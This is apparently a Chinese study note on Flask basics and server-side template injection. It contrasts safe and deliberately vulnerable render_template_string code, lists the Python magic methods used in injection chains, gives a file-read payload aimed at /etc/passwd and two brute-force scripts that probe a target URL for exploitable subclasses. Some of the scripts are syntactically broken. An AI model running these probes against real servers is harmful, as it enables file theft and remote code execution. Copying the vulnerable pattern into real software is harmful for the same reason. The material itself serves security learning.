记录ssti模板学习

Python3-venv（简称虚拟机编译器）

创建venv环境安装flask

创建环境python3 -m venv flask1

在flask1下使用虚拟机内的python3执行

方法一：/opt/flask/bin/python3 demo.py

方法二：source ./bin/activate

退出环境deactivate

Flask学习

Flask就是使用python编写的轻量级Web应用框架（模板引擎使用jinja2）

简单的flask

app.run中的参数host=‘ip地址（0.0.0.0监听本地和ip） debug=true（开启日志，一边改一边重启） port=端口’

变量

方法

Html文件在python中必须放在templates下

Flask模板

处理业务逻辑和返回响应内容

处理逻辑如同：计算器1+1给后端处理计算

返回响应内容：计算后会返回给界面2

模板就是响应内容的呈现

Flask默认使用jinja2

视图函数只负责处理业务逻辑，模板负责响应内容

模板函数render_template加载html文件。默认在templates目录下

模板函数render_template_string用于渲染字符串，直接定义内容

Flask使用代码

Templates目录下放index，html文档中用{{ }}形式去解析传进来的my_int等到页面上

<p>{{my_str}}<p>
{{my_int}}
{{my_array}}
{{my_dict}}

{% set a=‘dazhuang’%}{{a}}页面就会返回dazhuang (一般用于设置值)

Render_template_string代码使用直接渲染

from flask import Flask,render_template,request,render_template_string

app = Flask(__name__)

@app.route('/',methods=['GET'])
def index():
name = request.args.get('name')
my_array = {1,2,3,4,5}
return render_template_string('<p>%s</p><br><h1>%s</h1>' % (name,my_array))

if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True,port=5000)

ssti模板注入

flask漏洞----flask代码不严谨可能造成任意文件读取和rce远程控制后台

漏洞成因：

渲染模板时，没有严格控制对用户的输入；使用了危险的模板，导致用户可以和flask交互；

Flask是基于python开发的一种轻量级服务器，意味着用户可以和flask交互的话，就可以执行python中的危险函数eval，system，file等等之类的函数。

漏洞演示：

Python代码：正常代码

from flask import Flask,render_template,request,render_template_string

app = Flask(__name__)

@app.route('/',methods=['GET'])
def index():
name = request.args.get('try')
html_str = " <html><head></head><body>{{str}}</body></html>"

return render_template_string(html_str,str=name)

if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True,port=5000)

原因是str被{{}}包括起来了，会被预先渲染转义，然后在输入，不会被渲染执行。

Python代码：错误的配置：

from flask import Flask,render_template,request,render_template_string

app = Flask(__name__)

@app.route('/',methods=['GET'])
def index():
name = request.args.get('try')
html_str = " <html><head></head><body>{0}</body></html>".format(name)

return render_template_string(html_str)

if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True,port=5000)

发现大概原因了吗？

因为第二个使用了格式化字符串{0}加format（name）。说白了就是先执行后渲染。我的理解就是render_template_string就直接转义并输出，而第二个先填充后转义，在填充时执行了python代码。

除了用{{7*7}}去测试还可以用一些python中的魔术方法（{{‘’.__class__.__mro__}}）去测试下一章就会聊这个。

各模板注入的测试流程，绿色指正常执行，红色指返回了没有执行，一步一步去判断是什么模板。

继承关系和魔术方法

继承关系指漏洞利用的逻辑

魔术方法指利用的指令

父类和子类

子类调用父类下的其他子类

Python flask没法直接使用python指令

__class__： 指向实例化的一个类

__base__： 指向实例化类的父类

__mro__：罗列所有的类

__subclasses__(): 查看那个类下的所有子类

__init__: 查看类是否重载，重载是指程序在运行时已经加载好的这个模板内存中，wrapper说明没有挂载。

__globals__：函数会以字典形式返回当前对象的全部全局变量 (相当于就是类中的全部方法)

__builtins__: 提供对python的所有“内置”标识符直接访问

Popen（）：执行一个shell以运行命令来开启 一个进程

懂了这里就可以看懂下面代码了

class A:pass
class B(A):pass
class C(B):pass
class D(B):pass
c = C()
print(c.__class__)

c.__class__

c.__class__.__base__

c.__class__.__base__.__base__

c.__class__.__base__.__base__.__base__

c.__class__.__mro__ 罗列c继承的所有类

c.__class__.__mro__[1].__subclasses__()

常用的注入模板

文件读取

查找子类_frozen_importlib_external.FileLoader

【“get_data”】（0，“/etc/password”）

Python脚本去找子类

import requests
url = input("请输入链接")
for i in range(500):
data = {
"name": "{{().__class__.__base__.__subclasses__()["+str(i)+"]"}
try:
res = requests.post(url,data=data)
if res.status_code == 200:
if '_frozen_importlib_external.FileLoader' in res.text:
print(i)
except:
pass

可以找自己想要的子类

内置函数eval执行函数

找builtins的eval

import requests
url = input("输入url")
for i in range(500):
data = {
"name": "{{().__class__.__base__.__subclasses__()["+str(i)+"].__init__.__globals__['__builtins__']"
}
try:
res = requests.post(url,data=data)
if res.status_code == 200:
if 'eval' in res.text:
print(i)
except:
pass

payload

Os模块执行命令

在其他函数中直接调用os模块

通过config 调用

通过url_for 调用

在已经加载的模块中找os

第三方库importlib类执行命令

可以加载第三方库，使用load_module加载os

Linecache函数执行命令

Linecache原本只读一行但是内置了os模块

Subprocess.popen类执行命令（思路都是差不多）

汇总

最后就是实战加学一点绕过就可以毕业了